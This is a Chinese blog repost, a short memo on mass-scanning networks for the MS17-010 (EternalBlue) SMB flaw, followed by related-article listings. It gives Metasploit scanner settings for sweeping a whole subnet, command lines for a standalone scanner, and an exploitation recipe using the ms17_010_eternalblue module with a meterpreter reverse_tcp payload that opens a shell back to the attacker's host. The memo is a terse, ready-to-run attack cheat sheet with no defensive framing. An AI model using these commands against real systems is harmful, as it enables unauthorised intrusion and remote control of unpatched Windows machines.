ms17010批量扫描备忘

最新推荐文章于 2024-04-21 11:48:20 发布
最新推荐文章于 2024-04-21 11:48:20 发布
阅读量492 收藏
点赞数
文章标签: 网络
原文链接:http://www.cnblogs.com/whoami101/p/7151214.html
版权 
安装一些依赖:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 
        rm -r ~/.wine 
        wine cmd.exe   
        exit
漏洞扫描一:
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.1-192.168.0.254
set ShowProgress false
set ConnectTimeout 5
set threads 16
services -r tcp -p 445 -R
run

扫139端口的话

set SMBDirect false
set RPORT 139

或者

unset SMBDirect
set RPORT 139
漏洞扫描二:

$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out

指定目标主机列表(每行一个目标):

$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out

该漏洞可以通过139/TCP利用,不限于445/TCP:

$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out -p 139
$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out -p 139

如果不指定"-o scan.out",向stdout输出

-q

    只显示vulnerable主机,否则将显示safe、unknown等其他主机

-m

    实时显示当前扫描目标,可以不指定

漏洞扫描三:
http://www.freebuf.com/sectool/134657.html

漏洞利用一:
gem install ruby_smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.86

漏洞利用二:
http://www.freebuf.com/articles/system/133853.html

  

 

 

 

参考文章:

http://www.freebuf.com/sectool/134657.html
http://scz.617.cn/windows/201706221521.txt
http://scz.617.cn/windows/201707031558.txt

转载于:https://www.cnblogs.com/whoami101/p/7151214.html

weixin_34097242
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
ms17_010扫描工具
qq_34450601的博客
05-09 3253
ms17_010扫描工具msf中的辅助模块含有一个强大的ms17_010扫描工具:auxiliary/scanner/smb/smb_ms17_010使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单。首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16。实际上经过测试,只需扫描10.31.0-128.1-254 就可以了。具体...
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3243
永恒之蓝
ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1570
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用
扫描病毒》备忘1
08-08
扫描病毒》备忘更新记录 解题思路 毛毛虫剖分,先标号重链,再标号轻边的子树顶,再标号轻边的子树(不含顶)若果查询方式定义不好需要很多特判和分类讨论,好的方法
C#实现备忘录功能
12-31
 备忘录,相信大家生活中都使用过,比如记笔记、手机备忘录等等,这些都是记录自己灵感时所想、定期内想做的事情,好像跑题了,说说我的备忘录吧,我的备忘录功能上也就是增删改查的操作,另加到时提醒、语音播放...
Linux 备忘手册.zip
10-17
linux常用命令大全
易语言备忘
07-22
易语言备忘录源码,备忘
易语言备忘录提醒
08-22
易语言备忘录提醒源码系统结构:皮肤1,GOOD,读数据,goof,子程序1,gooo, ======窗口程序集1 || ||------__启动窗口_创建完毕 || ||------皮肤1 || ||------_组合框1_列表项被选择 || ||------GOOD || ||------读数
nessus插件(2019年年初的离线插件库,重点是可以检测出ms17-010漏洞哦)
12-27
nessus插件(2019年年初的离线插件库,重点是可以检测出ms17-010漏洞哦)
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
永恒之蓝漏洞(MS17-010)图形化扫描器-Eternal Blues
jiangbb8686的博客
11-26 2386
近期,国外安全研究者针对永恒之蓝漏洞开发出了一款名为Eternal Blues的免费图形化漏洞扫描器,能让你一键上手,快速识别内网存在MS17-010漏洞的主机。 近期,国外安全研究者针对永恒之蓝漏洞开发出了一款名为Eternal Blues的免费图形化漏洞扫描器,能让你一键上手,快速识别内网存在MS17-010漏洞的主机。从WannaCry到Petya,永恒之蓝漏洞(MS17-010)的威力持...
MS17-010永恒之蓝-漏洞利用+修复方法
WEB渗透测试 从入门到萌新
04-21 7953
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
永恒之蓝-------MS17010漏洞重现
2301_77144243的博客
06-07 2181
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
漏洞复现之(MS17-010
weixin_56513549的博客
11-02 2742
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
Nessus结合metasploit复现MS17-010
W小哥
12-29 826
本机IP:192.168.212.129 靶机IP:192.168.212.128 一、nessus漏洞发现 第一步:用nessus扫描win7操作系统 (注意:win7操作系统在虚拟机钟,若扫描几秒钟就结束,则是物理机winpcap不是最新版问题,安装最新版即可,另外如果重置了虚拟网卡winpcap也得卸载重新安装,或者重启,不然nessus则找不到虚拟网卡) 登陆进nessus,进入如下界面...
网络安全之反弹Shell
小飞的博客
04-12 1510
网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
webman 事务回滚失效问题记录
最新发布
juan9872的博客
04-21 527
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
andorid studio备忘
03-11
Android Studio备忘录是一个用于记录和管理备忘事项应用程序。它是基于Android平台开发的,提供了丰富的功能和用户友好的界面,方便用户随时记录和查看备忘录。 以下是Android Studio备忘录的一些主要功能: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值